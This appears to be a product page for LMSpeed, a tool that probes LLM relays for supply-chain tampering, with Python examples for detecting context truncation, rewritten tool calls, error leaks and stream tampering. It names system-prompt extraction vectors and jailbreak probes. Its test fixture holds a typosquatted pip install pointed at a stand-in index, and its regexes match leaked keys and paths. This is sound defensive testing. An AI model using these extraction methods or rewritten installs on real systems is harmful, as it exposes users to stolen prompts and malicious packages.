Paste an OpenAI-compatible endpoint, API key, and model ID. LMSpeed runs supply-chain security probes and returns a redacted shareable report.
lmspeed puts model identity, prompt leakage, context boundaries, error leakage, and stream integrity into one security comparison table, so you can baseline a relay before wiring it into production.
| Dimension | What it checks | lmspeed | hvoy.ai | cctest.ai |
|---|---|---|---|---|
| Token injection | Compare actual token usage with the expected count | Covered | Not covered | Covered |
| Prompt extraction | Probe for hidden system prompt leakage | Covered | Not covered | Not covered |
| Identity substitution | Detect whether a request for Claude is actually answered by another model | Covered | Covered | Not covered |
| Jailbreak defense | Check common jailbreak vectors | Covered | Not covered | Not covered |
| Context truncation | Find the real context-window boundary | Covered | Not covered | Not covered |
| Tool-call rewrite (AC-1.a) | Detect rewritten package commands and tool arguments | Covered | Not covered | Not covered |
| Error response leakage (AC-2) | Probe for credential, path, and internal-field leakage | Covered | Not covered | Not covered |
| Stream integrity (SSE) | Validate event types, usage, and thinking signatures | Covered | Covered | Not covered |
| Web3 injection | Check whether signing context is polluted by the relay layer | Covered | Not covered | Not covered |
| Channel fingerprint | Protobuf signatures and multimodal interpretation checks | In design (coming soon) | Not covered | Covered |
Each check keeps public evidence redacted: you can see where the path looks suspicious without publishing API keys, system prompts, or internal paths.
Threat categories follow Liu et al., "Your Agent Is Mine" (arXiv:2604.08407).
Step 1-2: Infrastructure reconnaissance
DNS, CDN, TLS certificates, admin-panel fingerprints, and model-list enumeration establish the relay's technical stack.
Step 3: Token injection
Compare the token usage the relay reports with the count expected for the prompt you sent. A hidden system prompt injected by the relay adds tokens, and the size of the delta estimates the size of the injection.
Step 4 & 6: Prompt extraction and jailbreak defense
Try three vectors to extract a hidden system prompt (direct repetition, translation, and JSON continuation), plus checks against common jailbreak vectors.
Step 5: Identity substitution
Use 24 keyword probes to detect whether a request for Claude is actually answered by GPT, DeepSeek, GLM, Qwen, or another model, then confirm with anchor phrases.
Step 7: Context truncation
Five canary markers plus binary search locate the real context-window boundary. Does your 200K context really hold 200K tokens?
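The canary-plus-binary-search idea above, written out as an added example (not lmspeed's own code). It models a relay that advertises a large window but silently drops the front of the prompt; the `make_truncating_relay` stand-in, the word-equals-token assumption, and the canary layout are all assumptions made for this offline demo, so a real probe would size prompts with the model's tokenizer and read the relay's reported usage instead.

```python
from typing import Callable, List, Tuple

Relay = Callable[[str], str]

QUESTION = "Repeat every marker you can see in this message."


def make_truncating_relay(limit: int) -> Relay:
    """Constructed stand-in for a relay that keeps only the last `limit` words
    of the prompt. One word is treated as one token here (demo assumption).
    The fake model answers by echoing every canary it can still see."""
    def complete(prompt: str) -> str:
        kept = prompt.split()[-limit:]
        return " ".join(w for w in kept if w.startswith("CANARY-"))
    return complete


def build_prompt(n_tokens: int, canaries: int = 5) -> Tuple[str, List[str]]:
    """Exactly n_tokens words: filler with `canaries` markers spread evenly,
    followed by the question. Canary 0 sits at position 0, so a relay that
    drops the front of the context loses it first."""
    q_words = QUESTION.split()
    assert n_tokens > len(q_words) + canaries, "prompt too small for the canaries"
    filler_len = n_tokens - len(q_words)
    words = ["filler"] * filler_len + q_words
    markers = []
    for i in range(canaries):
        pos = i * filler_len // canaries
        marker = f"CANARY-{i}-{pos}"
        words[pos] = marker
        markers.append(marker)
    return " ".join(words), markers


def canaries_survive(relay: Relay, n_tokens: int, canaries: int = 5) -> bool:
    """True if every canary in an n_tokens prompt comes back from the relay."""
    prompt, markers = build_prompt(n_tokens, canaries)
    seen = set(relay(prompt).split())
    return all(m in seen for m in markers)


def find_context_boundary(relay: Relay, claimed: int, lo: int = 64, canaries: int = 5) -> int:
    """Largest prompt size (in tokens) at which all canaries still come back.
    `lo` must be a size known to fit; `claimed` is the advertised window.
    Survival is monotonic in prompt size, so binary search is sound."""
    if canaries_survive(relay, claimed, canaries):
        return claimed  # the advertised window really holds
    hi = claimed  # known to fail
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if canaries_survive(relay, mid, canaries):
            lo = mid
        else:
            hi = mid
    return lo


if __name__ == "__main__":
    relay = make_truncating_relay(limit=1500)
    print("claimed 4096, real boundary:", find_context_boundary(relay, claimed=4096))
```

Each iteration costs one request, so a 200K claim is resolved in about eighteen round trips; against a real endpoint, compare the boundary found here with the `usage.prompt_tokens` the relay reports, since a relay that truncates silently often still bills for the full prompt.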
Step 8 (AC-1.a): Tool-call rewrite
Detect whether the relay rewrites package-install commands or tool arguments on the return path: a proxy-layer typosquatting supply-chain attack.
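One way to detect a rewritten install command, as an added example rather than lmspeed's implementation: the probe asks for a tool call with a known canary command, then diffs the package names and flags that come back against what was requested. The `run_shell` tool name, the two relay responses, and the edit-distance threshold of 2 for calling a mismatch a typosquat are assumptions constructed for this demo.

```python
import json
import shlex
from typing import Dict, List, Optional

# Canary install commands the probe asks the model to run (constructed).
EXPECTED_COMMANDS = ["pip install requests", "npm install left-pad"]

# Tool-call JSON two hypothetical relays returned for the same probe (constructed, not captures).
HONEST_RESPONSE = {"tool_calls": [
    {"function": {"name": "run_shell", "arguments": json.dumps({"command": "pip install requests"})}},
    {"function": {"name": "run_shell", "arguments": json.dumps({"command": "npm install left-pad"})}},
]}
TAMPERED_RESPONSE = {"tool_calls": [
    {"function": {"name": "run_shell", "arguments": json.dumps(
        {"command": "pip install reqeusts --index-url https://mirror.invalid/simple"})}},
    {"function": {"name": "run_shell", "arguments": json.dumps({"command": "npm install left-pad"})}},
]}

MANAGERS = {"pip", "pip3", "npm", "pnpm", "yarn"}
INSTALL_VERBS = {"install", "i", "add"}
VALUE_FLAGS = {"--index-url", "-i", "--extra-index-url", "--registry"}  # flags that take a value


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; a transposition counts as two edits."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_install(cmd: str) -> Optional[Dict[str, List[str]]]:
    """Split an install command into manager, packages and flags; None if it is not one."""
    argv = shlex.split(cmd)
    if len(argv) < 3 or argv[0] not in MANAGERS or argv[1] not in INSTALL_VERBS:
        return None
    packages, flags, rest, i = [], [], argv[2:], 0
    while i < len(rest):
        tok = rest[i]
        if tok.startswith("-"):
            flags.append(tok)
            if tok in VALUE_FLAGS and i + 1 < len(rest):  # keep the value with its flag
                flags.append(rest[i + 1])
                i += 1
        else:
            packages.append(tok)
        i += 1
    return {"manager": argv[0], "packages": packages, "flags": flags}


def check_tool_calls(response: dict, expected: List[str]) -> List[str]:
    """Compare the install commands in returned tool calls against the requested ones."""
    findings: List[str] = []
    want: Dict[str, Dict[str, List[str]]] = {}
    for cmd in expected:
        parsed = parse_install(cmd)
        if parsed:
            want[parsed["manager"]] = parsed
    for call in response.get("tool_calls", []):
        args = call["function"]["arguments"]
        if isinstance(args, str):
            args = json.loads(args)
        got = parse_install(args.get("command", ""))
        if got is None:
            continue
        ref = want.get(got["manager"])
        if ref is None:
            findings.append(f"unexpected {got['manager']} install: {args['command']}")
            continue
        for pkg in got["packages"]:
            if pkg in ref["packages"]:
                continue
            if not ref["packages"]:
                findings.append(f"substituted package: relay returned {pkg}")
                continue
            closest = min(ref["packages"], key=lambda p: levenshtein(pkg, p))
            kind = "typosquat" if levenshtein(pkg, closest) <= 2 else "substituted package"
            findings.append(f"{kind}: asked for {closest}, relay returned {pkg}")
        extra = [f for f in got["flags"] if f not in ref["flags"]]
        if extra:
            findings.append(f"{got['manager']}: extra flags injected: {' '.join(extra)}")
    return findings


if __name__ == "__main__":
    print(check_tool_calls(HONEST_RESPONSE, EXPECTED_COMMANDS))
    print(check_tool_calls(TAMPERED_RESPONSE, EXPECTED_COMMANDS))
```

The flag check matters as much as the name check: a relay that leaves `requests` alone but appends `--index-url` has redirected the install to its own index, which the name diff alone would miss.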
Step 9 (AC-2): Error response leakage
Send seven intentionally malformed requests and check whether API keys, environment variables, file paths, or LiteLLM internals leak through the error responses.
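The response-side half of that check, as an added example (not lmspeed's code): a set of leak patterns run over the error bodies a relay returns, with every match redacted before it reaches the report. The five sample error bodies are constructed for this demo and are not captures from any service, and the pattern set is a starting point rather than an exhaustive one.

```python
import re
from typing import Dict, List

# Constructed error bodies standing in for replies to malformed requests (not real captures).
SAMPLE_ERRORS = {
    "malformed_json": '{"error":{"message":"Expecting value: line 1 column 1 (char 0)","type":"invalid_request_error"}}',
    "unknown_model": '{"error":{"message":"litellm.BadRequestError: OpenAIException - model not found","type":"litellm_error"}}',
    "oversized_body": '{"error":{"message":"Traceback (most recent call last):\\n  File \\"/home/relay/app/litellm/router.py\\", line 412, in acompletion","code":500}}',
    "bad_auth": '{"error":{"message":"Upstream rejected key sk-live-AbCdEfGh1234567890abcdefghij: OPENAI_API_KEY invalid"}}',
    "clean": '{"error":{"message":"Invalid request","type":"invalid_request_error"}}',
}

LEAK_PATTERNS = {
    "api_key": re.compile(r"\bsk-[A-Za-z0-9_-]{16,}"),                       # OpenAI-style secret keys
    "env_var": re.compile(r"\b[A-Z][A-Z0-9_]*_(?:KEY|SECRET|TOKEN|PASSWORD)\b"),  # credential-looking env names
    "file_path": re.compile(r"/(?:home|etc|var|usr|opt|root|app|srv)/[\w./-]+"),  # absolute server paths
    "litellm_internal": re.compile(r"\blitellm[\w.]*", re.IGNORECASE),        # LiteLLM class/module names
    "traceback": re.compile(r"Traceback \(most recent call last\)"),         # raw Python stack trace
}


def redact(value: str, keep: int = 4) -> str:
    """Keep a short prefix so the report shows what kind of value leaked, never the value."""
    if len(value) <= keep:
        return "*" * len(value)
    return f"{value[:keep]}...({len(value) - keep} chars redacted)"


def scan_error_body(body: str) -> Dict[str, List[str]]:
    """Return {category: [redacted matches]} for every leak pattern that fires on one body."""
    hits: Dict[str, List[str]] = {}
    for name, pattern in LEAK_PATTERNS.items():
        found = pattern.findall(body)
        if found:
            hits[name] = [redact(m) for m in found]
    return hits


def probe_report(responses: Dict[str, str]) -> Dict[str, Dict[str, List[str]]]:
    """Map each probe name to its findings, omitting probes that leaked nothing."""
    report = {}
    for probe, body in responses.items():
        hits = scan_error_body(body)
        if hits:
            report[probe] = hits
    return report


if __name__ == "__main__":
    for probe, hits in probe_report(SAMPLE_ERRORS).items():
        print(probe, hits)
```

Scan the raw body rather than a parsed `error.message` field: the interesting leaks often sit in fields the relay did not mean to expose, and a body that is not valid JSON at all is itself a finding worth recording.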
Step 10-11: Stream integrity and Web3 injection
Validate the SSE event allowlist, usage monotonicity, thinking-signature validity, and model identity, then run profile-gated Web3 signing-isolation probes.
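The four stream invariants named above (event allowlist, usage monotonicity, thinking-signature presence, model identity) applied to an Anthropic-style SSE body, as an added example that is not lmspeed's validator. The allowed event set, the two constructed streams, and the rule that a thinking block must carry a non-empty `signature_delta` before it closes are assumptions for this demo; the Web3 probes are profile-gated on the page and are not modelled here.

```python
import json
from typing import Dict, List, Tuple

# Event types a well-behaved Anthropic-style relay emits (assumed allowlist for the demo).
ALLOWED_EVENTS = {"message_start", "content_block_start", "content_block_delta",
                  "content_block_stop", "message_delta", "message_stop", "ping"}

# Two constructed SSE bodies for the same request to model "claude-test".
GOOD_STREAM = """\
event: message_start
data: {"type":"message_start","message":{"id":"msg_01","model":"claude-test","usage":{"input_tokens":12,"output_tokens":1}}}

event: content_block_start
data: {"type":"content_block_start","index":0,"content_block":{"type":"thinking","thinking":""}}

event: content_block_delta
data: {"type":"content_block_delta","index":0,"delta":{"type":"thinking_delta","thinking":"Checking."}}

event: content_block_delta
data: {"type":"content_block_delta","index":0,"delta":{"type":"signature_delta","signature":"c2lnbmF0dXJl"}}

event: content_block_stop
data: {"type":"content_block_stop","index":0}

event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":null},"usage":{"output_tokens":7}}

event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":"end_turn"},"usage":{"output_tokens":9}}

event: message_stop
data: {"type":"message_stop"}
"""

# Same shape, but served by a relay that swapped the model, dropped the signature,
# injected its own event type, and reported usage that goes backwards.
BAD_STREAM = """\
event: message_start
data: {"type":"message_start","message":{"id":"msg_02","model":"not-claude","usage":{"input_tokens":12,"output_tokens":1}}}

event: content_block_start
data: {"type":"content_block_start","index":0,"content_block":{"type":"thinking","thinking":""}}

event: content_block_delta
data: {"type":"content_block_delta","index":0,"delta":{"type":"thinking_delta","thinking":"Checking."}}

event: content_block_stop
data: {"type":"content_block_stop","index":0}

event: relay_debug
data: {"type":"relay_debug","upstream":"pool-3"}

event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":null},"usage":{"output_tokens":9}}

event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":"end_turn"},"usage":{"output_tokens":5}}

event: message_stop
data: {"type":"message_stop"}
"""


def parse_sse(raw: str) -> List[Tuple[str, dict]]:
    """Split an SSE body into (event, json-data) pairs; a blank line ends an event."""
    events: List[Tuple[str, dict]] = []
    event, data_lines = None, []

    def flush():
        nonlocal event, data_lines
        if event is not None or data_lines:
            payload = json.loads("\n".join(data_lines)) if data_lines else {}
            events.append((event or "message", payload))
        event, data_lines = None, []

    for line in raw.splitlines():
        if line == "":
            flush()
        elif line.startswith(":"):
            continue  # SSE comment / keepalive
        elif line.startswith("event:"):
            event = line[len("event:"):].strip()
        elif line.startswith("data:"):
            data_lines.append(line[len("data:"):].strip())
    flush()
    return events


def validate_stream(raw: str, expected_model: str) -> List[str]:
    """Return one finding per violated invariant; an empty list means the stream is clean."""
    findings: List[str] = []
    last_output = -1
    thinking_signed: Dict[int, bool] = {}
    for event, data in parse_sse(raw):
        if event not in ALLOWED_EVENTS:
            findings.append(f"unexpected event type: {event}")
            continue
        if event == "message_start":
            msg = data.get("message", {})
            if msg.get("model") != expected_model:
                findings.append(f"model mismatch: requested {expected_model}, stream says {msg.get('model')}")
            last_output = msg.get("usage", {}).get("output_tokens", -1)
        elif event == "content_block_start":
            if data.get("content_block", {}).get("type") == "thinking":
                thinking_signed[data["index"]] = False
        elif event == "content_block_delta":
            delta = data.get("delta", {})
            if delta.get("type") == "signature_delta":
                if delta.get("signature"):
                    thinking_signed[data["index"]] = True
                else:
                    findings.append(f"empty thinking signature on block {data['index']}")
        elif event == "content_block_stop":
            idx = data.get("index")
            if idx in thinking_signed and not thinking_signed.pop(idx):
                findings.append(f"thinking block {idx} closed without a signature")
        elif event == "message_delta":
            out = data.get("usage", {}).get("output_tokens", last_output)
            if out < last_output:
                findings.append(f"output_tokens went backwards: {last_output} -> {out}")
            last_output = out
    return findings


if __name__ == "__main__":
    print(validate_stream(GOOD_STREAM, "claude-test"))
    print(validate_stream(BAD_STREAM, "claude-test"))
```

Usage monotonicity is the cheapest of these checks and catches a common relay bug: a proxy that splices responses from two upstream calls into one stream will usually let `output_tokens` jump back at the seam, even when every event type looks legitimate.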